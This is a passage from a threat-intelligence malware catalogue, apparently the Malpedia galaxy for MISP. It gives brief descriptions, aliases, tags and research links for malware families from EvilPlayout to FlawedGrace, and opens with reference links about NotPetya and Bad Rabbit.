https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/

https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf

https://attack.mitre.org/groups/G0034

https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna

https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/

https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://medium.com/@Ilandu/petya-not-petya-ransomware-9619cbbb0786

https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/

https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back

https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/

https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/

https://securelist.com/bad-rabbit-ransomware/82851/

http://www.intezer.com/notpetya-returns-bad-rabbit/

https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/

https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too

https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine

https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/

https://istari-global.com/spotlight/the-untold-story-of-notpetya/

https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/

https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/

https://www.atlanticcouncil.org/content-series/tech-at-the-leading-edge/the-russian-cyber-unit-that-hacks-targets-on-site/

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer

https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html

https://securelist.com/from-blackenergy-to-expetr/78937/

https://securelist.com/in-expetrpetyas-shadow-fakecry-ransomware-wave-hits-ukraine/78973/

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html

https://www.secureworks.com/research/threat-profiles/iron-viking

https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/

https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/

https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf

https://securelist.com/big-threats-using-code-similarity-part-1/97239/

https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html

http://blog.talosintelligence.com/2017/10/bad-rabbit.html

http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html

https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/

https://therecord.media/mondelez-and-zurich-reach-settlement-in-notpetya-cyberattack-insurance-suit/

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/

https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/

https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/

https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/

https://securelist.com/schroedingers-petya/78870/

https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/

https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games

https://www.riskiq.com/blog/labs/badrabbit/

https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks

https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/

https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/

https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html

https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware

https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://securelist.com/apt-trends-report-q2-2019/91897/

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://gvnshtn.com/maersk-me-notpetya/

https://securelist.com/apt-trends-report-q2-2020/97937/

https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html

https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/

https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b

EvilPlayout

A wiper used in an attack against Iran’s state broadcaster. The campaign name coined by Check Point is used here for lack of a better name for the wiper component.

The tag is: misp-galaxy:malpedia="EvilPlayout"

EvilPlayout is also known as:

Table 3454. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.evilplayout

https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/

EvilPony

Privately modded version of the Pony stealer.

The tag is: misp-galaxy:malpedia="EvilPony"

EvilPony is also known as:

  • CREstealer

Table 3455. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/

ExByte

ExByte is a custom data exfiltration tool and infostealer observed being used during BlackByte ransomware attacks.

The tag is: misp-galaxy:malpedia="ExByte"

ExByte is also known as:

Table 3458. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.exbyte

https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware

Excalibur

The tag is: misp-galaxy:malpedia="Excalibur"

Excalibur is also known as:

  • Saber

  • Sabresac

Table 3459. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur

https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies

Exile RAT

ExileRAT is a simple RAT platform capable of getting information on the system (computer name, username, listing drives, network adapter, process name), getting/pushing files and executing/terminating processes.

The tag is: misp-galaxy:malpedia="Exile RAT"

Exile RAT is also known as:

Table 3461. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat

https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html

Exorcist

According to PCrisk, Exorcist is a ransomware-type malicious program. Systems infected with this malware experience data encryption and users receive ransom demands for decryption. During the encryption process, all compromised files are appended with an extension consisting of a random string of characters.

For example, a file originally named "1.jpg" could appear as something similar to "1.jpg.rnyZoV" following encryption. After this process is complete, Exorcist ransomware changes the desktop wallpaper and drops HTML applications - "[random-string]-decrypt.hta" (e.g. "rnyZoV-decrypt.hta") - into affected folders. These files contain identical ransom messages.

The tag is: misp-galaxy:malpedia="Exorcist"

Exorcist is also known as:

Table 3463. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.exorcist

https://medium.com/@velasco.l.n/exorcist-ransomware-from-triaging-to-deep-dive-5b7da4263d81

Expiro

Expiro malware has been around for more than a decade, and the malware authors still continue their work and update it with more features. The infection routine was also changed in samples found in 2017 (described by McAfee). Expiro "infiltrates" executables on 32- and 64-bit Windows OS versions. It has capabilities to install browser extensions, change security behaviour/settings on the infected system, and steal information (e.g. account credentials). There is a newly described EPO file infector source code called m0yv from 2022, which is wrongly identified as Expiro by some AVs.

The tag is: misp-galaxy:malpedia="Expiro"

Expiro is also known as:

  • Xpiro

Table 3464. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro

https://www.welivesecurity.com/2013/07/30/versatile-and-infectious-win64expiro-is-a-cross-platform-file-infector/

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Expiro

https://github.com/GiacomoFerro/malware-analysis/blob/master/report/report-malware.pdf

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/

https://youtu.be/3RYbkORtFnk

https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d

ExplosiveRAT

The tag is: misp-galaxy:malpedia="ExplosiveRAT"

ExplosiveRAT is also known as:

Table 3465. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.explosive_rat

https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/

Xtreme RAT

According to Trend Micro, Extreme RAT (XTRAT, Xtreme Rat) is a Remote Access Trojan that can steal information. This RAT was used in attacks targeting the Israeli and Syrian governments in 2012.

This malware family of backdoors has the capability to receive commands such as File Management (Download, Upload, and Execute Files), Registry Management (Add, Delete, Query, and Modify Registry), Perform Shell Command, Computer Control (Shutdown, Log on/off), and Screen capture from a remote attacker. In addition, it can also log keystrokes of the infected systems.

The tag is: misp-galaxy:malpedia="Xtreme RAT"

Xtreme RAT is also known as:

  • ExtRat

Table 3466. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat

https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017

https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/

https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html

https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1

https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat

https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g

https://blogs.360.cn/post/APT-C-44.html

https://www.secureworks.com/research/threat-profiles/aluminum-saratoga

https://citizenlab.ca/2015/12/packrat-report/

https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html

EYService

EYService is the main part of the backdoor used by Nazar APT. This is a passive backdoor that relies on the now-discontinued Packet Sniffer SDK (PSSDK) from Microolap.

The tag is: misp-galaxy:malpedia="EYService"

EYService is also known as:

Table 3468. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice

https://blog.malwarelab.pl/posts/nazar_eyservice/

https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf

https://research.checkpoint.com/2020/nazar-spirits-of-the-past/

https://blog.malwarelab.pl/posts/nazar_eyservice_comm/

https://www.epicturla.com/blog/the-lost-nazar

FakeCry

Malware written in .NET that mimics WannaCry.

The tag is: misp-galaxy:malpedia="FakeCry"

FakeCry is also known as:

Table 3470. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fakecry

https://securelist.com/in-expetrpetyas-shadow-fakecry-ransomware-wave-hits-ukraine/78973/

fancyfilter

FancyFilter is a piece of code that documents code overlap between frameworks used by Regin and Equation Group.

The tag is: misp-galaxy:malpedia="fancyfilter"

fancyfilter is also known as:

  • 0xFancyFilter

Table 3474. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fancyfilter

https://www.epicturla.com/previous-works/hitb2020-voltron-sta

FantomCrypt

According to PCrisk, Fantom is a ransomware-type virus that imitates the Windows update procedure while encrypting files. This is unusual, since most ransomware encrypts files stealthily without showing any activity. During encryption, Fantom appends the names of encrypted files with the ".locked4", ".fantom" or ".locked" extension.

The tag is: misp-galaxy:malpedia="FantomCrypt"

FantomCrypt is also known as:

Table 3476. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt

https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/

FastLoader

FastLoader is a small .NET downloader whose name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and upload it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscation.

The tag is: misp-galaxy:malpedia="FastLoader"

FastLoader is also known as:

Table 3478. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader

FatalRat

According to PCrisk, FatalRAT is the name of a Remote Access Trojan (RAT). A RAT is a type of malware that allows the attacker to remotely control the infected computer and use it for various purposes.

Typically, RATs are used to access files and other data, watch computing activities on the screen and capture screenshots, steal sensitive information (e.g., login credentials, credit card details).

There are many legitimate remote administration/access tools on the Internet. It is common that cybercriminals use those tools with malicious intent too.

The tag is: misp-galaxy:malpedia="FatalRat"

FatalRat is also known as:

  • Sainbox RAT

Table 3480. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat

https://www.youtube.com/watch?v=gjvnVZc11Vg

https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html

https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape

https://cybersecurity.att.com/blogs/labs-research/new-sophisticated-rat-in-town-fatalrat-analysis

https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html

FatDuke

According to ESET Research, FatDuke is the current flagship backdoor of APT29 and is only deployed on the most interesting machines. It is generally dropped by the MiniDuke backdoor, but ESET have also seen the operators dropping FatDuke using lateral movement tools such as PsExec. The operators regularly repack this malware in order to evade detection. The most recent sample of FatDuke that ESET have seen was compiled on May 24, 2019. They have seen the operators trying to regain control of a machine multiple times in a few days, each time with a different sample. The packer adds a lot of code, leading to large binaries. While the effective code should not be larger than 1MB, ESET have seen one sample weighing in at 13MB, hence their name for this backdoor component: FatDuke.

The tag is: misp-galaxy:malpedia="FatDuke"

FatDuke is also known as:

Table 3481. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fatduke

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

https://www.secureworks.com/research/threat-profiles/iron-hemlock

FCT

Ransomware.

The tag is: misp-galaxy:malpedia="FCT"

FCT is also known as:

Table 3483. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fct

https://id-ransomware.blogspot.com/2020/02/fct-ransomware.html

fengine

The tag is: misp-galaxy:malpedia="fengine"

fengine is also known as:

Table 3487. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fengine

https://www.zscaler.jp/blogs/security-research/naver-ending-game-lazarus-apt

Feodo

Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victim’s computer, such as credit card details or credentials.

The tag is: misp-galaxy:malpedia="Feodo"

Feodo is also known as:

  • Bugat

  • Cridex

Table 3488. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo

https://feodotracker.abuse.ch/

http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html

http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html

https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/

https://en.wikipedia.org/wiki/Maksim_Yakubets

FFDroider

According to PCrisk, FFDroider is a malicious program classified as a stealer. It is designed to extract and exfiltrate sensitive data from infected devices. FFDroider targets popular social media and e-commerce platforms in particular.

The tag is: misp-galaxy:malpedia="FFDroider"

FFDroider is also known as:

Table 3489. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ffdroider

https://thehackernews.com/2022/04/researchers-warn-of-ffdroider-and.html

https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users

Ficker Stealer

According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we’ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.

The tag is: misp-galaxy:malpedia="Ficker Stealer"

Ficker Stealer is also known as:

Table 3490. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware

https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon

https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf

https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market

https://twitter.com/3xp0rtblog/status/1321209656774135810

https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/

https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a

Filerase

Filerase is a .NET API-based utility capable of propagating and recursively deleting files.

The tag is: misp-galaxy:malpedia="Filerase"

Filerase is also known as:

Table 3492. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail

Final1stSpy

The tag is: misp-galaxy:malpedia="Final1stSpy"

Final1stSpy is also known as:

Table 3493. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy

https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/

FinFisher RAT

FinFisher is a commercial software product used to steal information and spy on affected victims. It began with few functionalities, which included password harvesting and information leakage, but is now mostly known for its full Remote Access Trojan (RAT) capabilities. It is mostly known for being used in targeted governmental operations and lawful criminal investigations. It is well known for its anti-detection capabilities and use of VMProtect.

The tag is: misp-galaxy:malpedia="FinFisher RAT"

FinFisher RAT is also known as:

  • FinSpy

Table 3495. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher

https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/

https://securelist.com/finspy-unseen-findings/104322/

https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-2-first-attempt-at-devirtualization

https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-4-second-attempt-at-devirtualization

https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2

https://netzpolitik.org/2022/nach-pfaendung-staatstrojaner-hersteller-finfisher-ist-geschlossen-und-bleibt-es-auch/

https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf

https://www.msreverseengineering.com/blog/2018/2/21/finspy-vm-unpacking-tutorial-part-3-devirtualization

https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html

https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/

https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html

https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html

https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/

https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/

https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-3-fixing-the-function-related-issues

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

https://github.com/RolfRolles/FinSpyVM

https://securelist.com/apt-trends-report-q2-2019/91897/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation

https://www.msreverseengineering.com/blog/2018/2/21/wsbjxrs1jjw7qi4trk9t3qy6hr7dye

FINTEAM

Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer. This is achieved by sideloading a malicious DLL alongside the legitimate TeamViewer binary.

The tag is: misp-galaxy:malpedia="FINTEAM"

FINTEAM is also known as:

  • TeamBot

Table 3496. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.finteam

https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/

Fireball

The tag is: misp-galaxy:malpedia="Fireball"

Fireball is also known as:

Table 3497. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball

http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/

FireBird RAT

The tag is: misp-galaxy:malpedia="FireBird RAT"

FireBird RAT is also known as:

Table 3498. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.firebird_rat

https://twitter.com/casual_malware/status/1237775601035096064

Fire Chili

The purpose of this rootkit/driver is hiding and protecting malicious artifacts (e.g. files, processes, registry keys and network connections) from user-mode components. According to FortiGuard Labs, this malware uses Direct Kernel Object Modification (DKOM), which involves undocumented kernel structures and objects, for its operations, which is why this malware has to rely on specific OS builds.

The tag is: misp-galaxy:malpedia="Fire Chili"

Fire Chili is also known as:

Table 3499. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.firechili

https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits

https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html

FireCrypt

The tag is: misp-galaxy:malpedia="FireCrypt"

FireCrypt is also known as:

Table 3500. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt

https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/

FireMalv

The tag is: misp-galaxy:malpedia="FireMalv"

FireMalv is also known as:

Table 3501. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv

https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

FirstRansom

The tag is: misp-galaxy:malpedia="FirstRansom"

FirstRansom is also known as:

Table 3502. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom

https://twitter.com/JaromirHorejsi/status/815949909648150528

FiveHands

The tag is: misp-galaxy:malpedia="FiveHands"

FiveHands is also known as:

  • Thieflock

Table 3504. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fivehands

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-financially-motivated-aggressive-group-carrying-out-ransomware-campaigns-active-iocs

https://www.esentire.com/blog/hacker-infrastructure-used-in-cisco-breach-discovered-attacking-a-top-workforce-management-corporation-russias-evil-corp-gang-suspected-reports-esentire

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126b

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue

https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/

https://www.bleepingcomputer.com/news/security/yanluowang-ransomware-operation-matures-with-experienced-affiliates/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/

https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

Flagpro

According to PICUS, Flagpro is malware that collects information from the victim and executes commands in the victim’s environment. It targets Japan, Taiwan, and English-speaking countries. When a victim is infected with Flagpro malware, the malware can do the following:

  • Download and execute a tool

  • Execute OS commands and send results

  • Collect and send Windows authentication information

The tag is: misp-galaxy:malpedia="Flagpro"

Flagpro is also known as:

  • BUSYICE

Table 3505. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro

https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf

https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech

https://vblocalhost.com/uploads/VB2021-50.pdf

https://jp.security.ntt/resources/EN-BlackTech_2021.pdf

https://insight-jp.nttsecurity.com/post/102h7vx/blacktechflagpro

https://cyberandramen.net/2021/12/12/more-flagpro-more-problems/

FLASHFLOOD

FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the removable drive to the FLASHFLOOD-infected system. FLASHFLOOD may also log or copy additional data from the victim computer, such as system information or contacts.

The tag is: misp-galaxy:malpedia="FLASHFLOOD"

FLASHFLOOD is also known as:

Table 3507. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood

https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

FlawedAmmyy

FlawedAmmyy is a well-known Remote Access Tool (RAT) attributed to the criminal gang TA505 and used to take control of target machines. The name reflects its strong link with the leaked source code of Ammyy Admin, from which it took its main structure.

The tag is: misp-galaxy:malpedia="FlawedAmmyy"

FlawedAmmyy is also known as:

Table 3508. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://attack.mitre.org/software/S0381/

https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://habr.com/ru/company/pt/blog/475328/

https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/

https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do

https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930

https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat

https://www.youtube.com/watch?v=N4f2e8Mygag

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks

https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/

https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/

https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/

https://intel471.com/blog/a-brief-history-of-ta505

FlawedGrace

According to Proofpoint, FlawedGrace is written in C++ and can be categorized as a Remote Access Trojan (RAT). It appears to have been developed mainly in the second half of 2017.

FlawedGrace uses a series of commands, provided below for reference:

  • desktop_stat

  • destroy_os

  • target_download

  • target_module_load

  • target_module_load_external

  • target_module_unload

  • target_passwords

  • target_rdp

  • target_reboot

  • target_remove

  • target_script

  • target_servers

  • target_update

  • target_upload

The tag is: misp-galaxy:malpedia="FlawedGrace"

FlawedGrace is also known as:

  • GraceWire

Table 3509. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://blog.codsec.com/posts/malware/gracewire_adventure/

https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem

https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://twitter.com/MsftSecIntel/status/1273359829390655488

https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.secureworks.com/research/threat-profiles/gold-tahoe

